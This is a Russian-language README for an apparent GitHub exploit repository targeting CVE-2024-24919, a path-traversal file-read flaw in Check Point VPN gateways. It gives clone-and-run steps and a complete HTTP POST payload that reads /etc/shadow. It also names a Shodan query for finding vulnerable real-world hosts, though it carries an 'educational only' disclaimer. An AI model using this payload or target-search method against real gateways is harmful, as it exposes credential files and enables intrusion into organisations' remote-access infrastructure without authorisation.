
CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
Этот репозиторий содержит эксплойт на Python для уязвимости CVE-2024-24919, которая позволяет читать конфиденциальные файлы с уязвимой страницы.
Эксплойт сначала проверяет, уязвима ли цель, а затем получает путь, который вы укажете.
Серьёзность: Критическая
Сначала клонируйте репозиторий:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Дайте права и выполните эксплойт с помощью python3
chmod +x exploit.py
python3 exploit.py
Затем следуйте шагам, и вы получите данные указанного файла.
Если у вас возникли трудности, убедитесь, что указанный URL является основным
✓ https://google.com
✘ https://google.com/search?client=firefox
Сначала нам нужно убедиться, что на сайте включены Check Point Security Gateways с удалённым доступом VPN или мобильным доступом.
В этом эксплойте мы обращаемся к конечной точке {ip}/clients/MyCRL.
Эта конечная точка уязвима, если мы отправляем POST-запрос, добавляем строку CSHELL/ и путь к файлу, который хотим прочитать, используя Path Traversal.
Запрос будет выглядеть примерно так:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Всё это мы получили, изучив исходный код.
Для получения дополнительной информации о процессе смотрите этот пост --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Если вы хотите протестировать эту уязвимость, вы можете использовать Sodan для поиска уязвимых сайтов, используя этот запрос в Sodan
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на системах, на которые у вас есть разрешение на доступ.